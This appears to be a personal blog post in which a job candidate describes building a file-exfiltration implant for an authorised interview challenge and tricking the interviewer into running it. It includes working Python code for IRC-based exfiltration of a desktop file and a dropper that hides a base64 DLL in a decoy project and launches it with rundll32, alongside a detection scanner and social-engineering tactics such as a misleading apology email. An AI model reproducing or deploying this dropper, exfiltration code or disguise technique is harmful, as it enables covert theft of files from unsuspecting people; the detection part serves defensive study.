Brian Seel (cylussec)
Published May 13, 2015

How to collect a file from someone…

I am currently exploring a few options with regard to my current employment, and one of the companies I interviewed with presented me with a choice of challenges I could do. I had basically 48 hours (during the middle of the week) to complete one of the following (I have redacted some of the details at their request):

  • Draw a set of bubbles of user specified size, and leave no space between them
  • Create a tool that would exfiltrate a file from someone’s desktop (and socially engineer them to get them to open it)
  • A secure chat client

I chose the second one, simply because it seemed to match up with my skill set the best, and seemed reasonably challenging as a three evening project. The third one seemed like I could basically take an existing chat client, and just use some RSA on it to make it secure. And the first one just seemed boring. So let's dive in.

The first thing I considered was how I was going to socially engineer my target to get him to open it. I figured this was a good first step as that might shape how I did the rest of the challenge. I started down the route of searching around about him, as I already knew his name, location and place of employment. But that felt creepy.

So I decided that I would send a solution to the bubble problem, as he was already expecting an email from me. But then just have that code kick off my collection agent. I could write my agent in C++, and then use Python’s subprocess and rundll32 to kick off the DLL. It seemed perfect:

  1. While Python is pretty powerful, no one really considers it a ‘dangerous’ file format. If you see a vbs file, you assume it’s a virus. Python script? Whatever, just run it. It’s easy to open the source, so it must be ok.
  2. I could base64-encode my DLL in there, drop it to disk, and run it
  3. If I put enough Python files in the solution, then it would not be obvious what was going on.

Perfect, so I can write this as a DLL.

I wrote a DLL in C++ with a heavily object oriented model. In my day job, we do a lot of C style C++ development (what one of my coworkers so succinctly called C+). There is no real reason for it, other than the fact that everyone has done it that way. I have been pushing for us to switch, but I figured this was a great experience to jump in head first to practice a bit.

I also needed an ‘always up’ way that I could do my collection. A tried and true method is to just use IRC as a command and control server. Although, in all honesty, I wasn’t able to get real command and control because of the time constraints. It’s probably better that I was time constrained, or I might have built an implant that could take tasking.

In the end, I set up the connection with IRC, and then start a ‘survey’ (which just looks for ~/Desktop/flag.txt and sends it back). Hard coded. Not pretty, but it worked in my testing.
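The IRC exchange described above, framed as RFC 1459 lines with a fake transport so it runs offline. This is an added example in Python and not the author’s C++ DLL; the nick, the channel name, the base64 chunking and the flag contents are all assumptions made for the example.

```python
import base64
import os
import tempfile
from typing import List, Optional

IRC_MAX_LINE = 512  # RFC 1459 message limit, CRLF included


def survey(home: str) -> Optional[bytes]:
    """The hard-coded survey from the post: read ~/Desktop/flag.txt if it exists."""
    target = os.path.join(home, "Desktop", "flag.txt")
    if not os.path.isfile(target):
        return None
    with open(target, "rb") as fh:
        return fh.read()


def register(nick: str, channel: str) -> List[str]:
    """Registration and channel join the implant sends first (nick and channel are assumed)."""
    return [f"NICK {nick}\r\n", f"USER {nick} 0 * :{nick}\r\n", f"JOIN {channel}\r\n"]


def exfil_lines(channel: str, data: bytes) -> List[str]:
    """Base64 the file and split it across PRIVMSGs that each fit the 512-byte limit."""
    prefix = f"PRIVMSG {channel} :"
    room = IRC_MAX_LINE - len(prefix) - len("\r\n")
    encoded = base64.b64encode(data).decode("ascii")
    return [prefix + encoded[i:i + room] + "\r\n" for i in range(0, len(encoded), room)]


def handle_server_line(line: str) -> Optional[str]:
    """Keepalive on the implant side: a server PING must be answered with PONG or the
    connection is dropped before the survey finishes. Other traffic needs no reply."""
    if line.startswith("PING "):
        return "PONG " + line[5:].rstrip("\r\n") + "\r\n"
    return None


def reassemble(channel: str, lines: List[str]) -> bytes:
    """What the operator does with the logged PRIVMSGs: strip the prefix and decode."""
    prefix = f"PRIVMSG {channel} :"
    chunks = [ln[len(prefix):].rstrip("\r\n") for ln in lines if ln.startswith(prefix)]
    return base64.b64decode("".join(chunks))


def demo(home: Optional[str] = None) -> dict:
    """Constructed home directory with a flag file; returns the full client-side script
    and the operator-side reassembly so the two can be compared."""
    home = home or tempfile.mkdtemp(prefix="home_")
    os.makedirs(os.path.join(home, "Desktop"), exist_ok=True)
    with open(os.path.join(home, "Desktop", "flag.txt"), "wb") as fh:
        fh.write(b"flag{constructed-sample}\n" * 40)  # ~1 KB, forces several PRIVMSGs
    data = survey(home)
    channel = "#survey"  # assumed rendezvous channel
    sent = register("bubblebot", channel) + exfil_lines(channel, data)
    return {"sent": sent, "recovered": reassemble(channel, sent), "original": data}


if __name__ == "__main__":
    for line in demo()["sent"]:
        print(repr(line))
```

The chunking matters in practice: a single PRIVMSG longer than 512 bytes is truncated by the server, so a one-line dump of a file bigger than a few hundred bytes silently loses its tail.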

The second part of this was to ‘socially engineer’ the target to run the implant. This whole part was a last minute addition (literally 11th hour, as they wanted it by midnight and I started this part at 11pm). I almost decided to actually do the bubble challenge, but I was using subprocess.call('rundll32 mydll.dll,#1') as my method of kicking off the DLL. That is a blocking call, and while there are ways for me to kick off a function as a separate process in Python, it really came down to time. So I wrote some stuff that looked like the draw script (with turtle), dropped a bunch of Django files into a directory structure to make it look legit, and threw my base64 encoded dll in a file (a few folders deep).
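The dropper pattern from the numbered list above (a DLL base64-encoded inside a Python source file, decoded to disk and handed to rundll32) together with the blocking-call problem from this paragraph, plus the check a code reviewer would run over the “solution” to catch it. This is an added example, not the author’s code: the DLL bytes are a constructed stand-in (PE magic only, nothing loadable), the directory names are made up, and the non-blocking launch uses subprocess.Popen in place of the subprocess.call the post mentions.

```python
import base64
import binascii
import os
import re
import subprocess
import sys
import tempfile
from typing import List, Optional, Tuple

# Constructed stand-in for the collection DLL: only the PE/DOS header magic, not a
# loadable module, so nothing here executes native code.
FAKE_DLL = b"MZ\x90\x00" + b"This program cannot be run in DOS mode." + b"\x00" * 64


def embed_payload(dll_bytes: bytes, var_name: str = "_assets") -> str:
    """Python source that carries the DLL as a base64 string literal (the 'asset'
    file buried a few folders deep in a decoy Django tree)."""
    encoded = base64.b64encode(dll_bytes).decode("ascii")
    return f'{var_name} = "{encoded}"\n'


def stage_payload(encoded: str, out_dir: str) -> str:
    """Decode the literal back to bytes and write it to disk; the returned path is
    what rundll32 would be handed."""
    path = os.path.join(out_dir, "mydll.dll")
    with open(path, "wb") as fh:
        fh.write(base64.b64decode(encoded))
    return path


def launch_dll(path: str, ordinal: int = 1) -> Optional[subprocess.Popen]:
    """Start rundll32 on the DLL's export #ordinal without blocking the caller.

    subprocess.call("rundll32 mydll.dll,#1") waits for rundll32 to exit, which is
    why the decoy script appeared to hang; Popen returns immediately so the script
    can carry on. Windows only, and never invoked by demo() below.
    """
    if not sys.platform.startswith("win"):
        return None
    return subprocess.Popen(["rundll32.exe", f"{path},#{ordinal}"])


# Reviewer's check: long base64 string literals that decode to a PE image ('MZ').
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{64,}={0,2})"')


def find_embedded_pe(root: str) -> List[Tuple[str, int]]:
    """Walk a source tree and return (path, decoded_size) for every .py file whose
    base64 literals decode to something starting with the PE 'MZ' magic."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".py"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                text = fh.read()
            for literal in B64_LITERAL.findall(text):
                try:
                    blob = base64.b64decode(literal, validate=True)
                except binascii.Error:  # not valid base64 after all
                    continue
                if blob[:2] == b"MZ":
                    hits.append((full, len(blob)))
    return hits


def demo(root: Optional[str] = None) -> dict:
    """Build the decoy tree, stage the payload the way the script would at run time,
    and run the scanner over the tree. Directory names are made up for the example."""
    root = root or tempfile.mkdtemp(prefix="bubbles_")
    deep = os.path.join(root, "bubbles", "static", "vendor")
    os.makedirs(deep, exist_ok=True)
    source = embed_payload(FAKE_DLL)
    with open(os.path.join(deep, "assets.py"), "w", encoding="utf-8") as fh:
        fh.write(source)
    # What the decoy script does when run: pull the literal out and write the DLL.
    literal = B64_LITERAL.search(source).group(1)
    dropped = stage_payload(literal, deep)
    with open(dropped, "rb") as fh:
        recovered = fh.read()
    return {
        "dropped": dropped,
        "recovered_ok": recovered == FAKE_DLL,
        "hits": find_embedded_pe(root),
    }


if __name__ == "__main__":
    print(demo())
```

The scanner is deliberately dumb: it only looks at double-quoted literals of 64 or more base64 characters and only at the first two decoded bytes. That is enough to flag the trick described in the post, where the payload sits in one file among many, and it is the kind of check worth running before executing any code that arrives by email, however plausible the surrounding project looks.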

The social engineering part of it was an email that basically apologized for not having more time to work on it, and that it should work. When it’s run, it prints an error and hangs. At this point, I just need the python script to run for about 10 seconds for the connection with IRC to get going. According to the IRC logs I got this evening, he let it run for about two minutes, which was more than enough time to get my collection!

I was able to talk to my target afterwards, and found out that the whole thing worked fairly well except for two things:

  • My email didn’t completely fool him. He said it was one of the better attempts he had seen for this challenge, but that he is pretty suspicious in general. Oh well.
  • I didn’t statically link all of the required libraries. Although considering I did zero testing outside of my dev box (again, time), I consider this a pretty big win.

So sweet.

Things I didn’t have time for:

  • Persistence — probably not needed because it’s just a smash and grab, but I was going to drop it in Appinit.
  • Allowing it to get tasking — connect to the IRC server and have a bot give it dynamic tasking. This would have involved writing a protocol to some extent, and was overkill. Easy to skip in this timeframe.
  • Defensive programming — I did mostly check my return values. Mostly. There was room for improvement there.

I will drop this in GitHub shortly (having issues now), but here is a zip of the code: https://www.dropbox.com/s/5ecn7jkxbh791fh/FileCollection.zip?dl=0

Software developer; resident of Baltimore; love trying new things